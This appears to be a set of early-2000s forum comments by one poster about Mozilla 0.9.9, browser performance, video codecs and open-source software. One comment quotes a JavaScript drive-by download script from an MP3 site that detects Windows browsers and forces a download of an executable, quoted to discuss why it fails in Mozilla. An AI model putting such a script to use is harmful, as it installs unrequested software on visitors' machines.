How odd.... several people have stated that the download starts automatically in Mozilla yet it does not for me. I've already checked to see if the Proxomotron was blocking it, and it wasn't. I wonder whats keeping it from running....
I can confirm that these "auto-downloads" don't work under Mozilla 0.9.9. However judgeing by the script it looks like it works under Netscape 4.x and maybe under Netscape 6. But as you can see it only works on Windows comps. Have a look:
<script>
var exepath='http://www.mp3yes.com/free_mp3_finder.exe ';
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) { trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
install(); </script>
Interesting, "about:mozilla" in IE yields a blue screen as opposed to the red on with the KICK ASS text that Mozilla givs you. Opposite colors == opposite philosophy's in browser/software design perhaps...? Perhaps I'm just reading into this a bit too deeply.
As far a speed goes I see no difference between Mozilla 0.9.9, IE 5.5, and Opera 6.0 under Win2k. Although my system is a wee bit faster than most people's...... (and no, I'm not using Mozilla's quick start)
As far a sheer rendering power (ability to handle insanely complex markup), W3C compliance, and usability are concerned, Mozilla smokes IE and Opera like a couple of cheap joints at a rave.
Yea but look at whats next on the tree. Just imagine, massive debates over the technical merrits of Mozilla 1.0.x vrs Mozilla 1.1 hehe... Interesting times ahead I think.
FYI: I am assuming that CmdrTaco is refering to some sort of interactive video stream. (????) Not an actual game, as that would make absolutely no sense.

Or would you prefer EVERYTHING be rendered on the fly?
In the case of games, in a word, yes. Given the capablilities of the GeForce3 and GeForce4 Ti series and the Radeon 8500 with regards to DirectX 8.1 it shouldn't be that hard to do. Hell even a GeForce2 is overkill for the vast majority of todays games anyway. If you're looking for a good video codec then look no further than XviD or in the future, Tarkin. (Or DivX 3.11 if your into super awsome but illegal codecs.)
MPEG4 is essientally a super snazy version of flash for high quality video. Think about it. It is trying to make many different types of interactive media available on a wide range of platforms simultaneously. It's an attampt to make a single proprietary format that does everything. This is exactly what flash does/is trying to do. True, MPEG4 actually has uses beyond annoying banner ads but it is essentialy the same sort of idea. Just as flash can be surpassed by XML/CSS/DHTML so MPEG4 can be surpassed by XviD/Tarkin and OGG. The reason is because these alternatives fufill the primary purpose of flash and MPEG4, interactive web content and video/audio compression respectively while being free, open, stable, and universal. Yes the flash/MPEG4 paradigm provides cleaner intigration and a nicer package from a development standpoint but when lisenceing costs are factored in the open alternatives win hands down.

Hahaha!! I have GOT to write my homework programs for C++ like that and turn then in as such. I can't wait to see the look on my professor's face. Hehe, grat idea.
That's because the OSS movement is currently mostly working on operating systems, office suites, web browsers, server software, database applications, and other such things primaraly used by buissness. Games aren't exactly at the top of the priority list for buissness development.

You can get mouse gestures for Mozilla here.

How much lower can slashdot sink?
Isn't that a rather redundant question?
If your looking for a good April fools joke check this one out.

Doesn't that defeat the purpose of the question being asked on Slashdot in the first place?

As someone who's been using Mozilla since 0.9 I'd have to say that it "grew up" with 0.9.5 and then "sped up" with 0.9.7
